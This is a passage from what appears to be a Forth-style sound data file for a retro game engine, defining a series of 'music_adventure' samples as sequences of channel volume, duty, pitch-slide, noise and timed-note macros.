CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,56) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,55) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_LOW(3) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_HIGH(0) WAIT(0) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(2) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(0) CHAN_VOLUME_HIGH(4) WAIT(0) CHAN_VOLUME_HIGH(5) WAIT(0) CHAN_VOLUME_HIGH(6) WAIT(0) CHAN_VOLUME_HIGH(7) WAIT(3) CHAN_VOLUME_HIGH(6) WAIT(2) CHAN_VOLUME_HIGH(5) WAIT(2) CHAN_VOLUME_HIGH(4) WAIT(1) CHAN_VOLUME_HIGH(3) WAIT(1) CHAN_VOLUME_HIGH(2) WAIT(1) CHAN_VOLUME_HIGH(1) WAIT(1) CHAN_VOLUME_HIGH(0) WAIT(1) CHAN_VOLUME_LOW(7) WAIT(1) CHAN_VOLUME_LOW(6) WAIT(1) CHAN_VOLUME_LOW(5) WAIT(1) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_LOW(3) WAIT(0) SAMPLE_END .) music_adventure_sample_7: .( AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(13,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_8: .( AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(37,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,0) PLAY_TIMED_NOTE(0,34) PLAY_TIMED_NOTE(0,32) PLAY_TIMED_NOTE(0,30) PLAY_TIMED_NOTE(4,41) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,41) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,39) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,39) AUDIO_PULSE_META_NOTE_DSLIDE(36,1,15) AUDIO_PULSE_META_NOTE_DSLIDE(35,1,0) PLAY_TIMED_NOTE(0,33) PLAY_TIMED_NOTE(0,31) PLAY_TIMED_NOTE(0,29) PLAY_TIMED_NOTE(4,39) PLAY_TIMED_NOTE(4,43) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,48) PLAY_TIMED_NOTE(4,46) PLAY_TIMED_NOTE(4,44) PLAY_TIMED_NOTE(4,43) SAMPLE_END .) music_adventure_sample_9: .( AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .) music_adventure_sample_10: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .) music_adventure_sample_11: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(37,1,0,15,0) AUDIO_PULSE_META_WAIT_DUT_USLIDE(1,2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_DSLIDE(2,1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) AUDIO_PULSE_META_WAIT_USLIDE(2,-1) SAMPLE_END .) music_adventure_sample_12: .( AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PLAY_TIMED_FREQ(11,1) AUDIO_NOISE_SET_VOLUME(13) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(6) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_VOLUME(0) AUDIO_NOISE_WAIT(1) AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_HALT(4) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(7) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) AUDIO_NOISE_PLAY_TIMED_FREQ(12,1) AUDIO_NOISE_SET_PERIODIC(2) AUDIO_NOISE_PITCH_SLIDE_UP(1) AUDIO_NOISE_WAIT(0) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) AUDIO_NOISE_HALT(2) SAMPLE_END .) music_adventure_sample_13: .( AUDIO_NOISE_SET_VOLUME(15) AUDIO_NOISE_SET_PERIODIC(0) AUDIO_NOISE_PITCH_SLIDE_UP(0) SAMPLE_END .) music_adventure_sample_14: .( SAMPLE_END .) music_adventure_sample_15: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_USLIDE(2,-3) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,4) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) SAMPLE_END .) music_adventure_sample_16: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(29,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(3) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_17: .( SAMPLE_END .) music_adventure_sample_18: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,39) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_19: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,38) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_20: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_21: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(29,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,36) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_22: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,32) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,34) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,31) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,27) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_23: .( AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_USLIDE(2,-3) AUDIO_PULSE_META_WAIT_USLIDE(1,-1) AUDIO_PULSE_META_WAIT_DSLIDE(1,0) AUDIO_PULSE_META_WAIT_DSLIDE(1,4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) PITCH_SLIDE(0) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,24) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_24: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_25: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(2) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(0) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,0,1) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) SAMPLE_END .) music_adventure_sample_26: .( CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) SAMPLE_END .) music_adventure_sample_27: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(43,1,0,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,43) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(1) CHAN_VOLUME_LOW(1) PLAY_TIMED_NOTE(0,41) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) 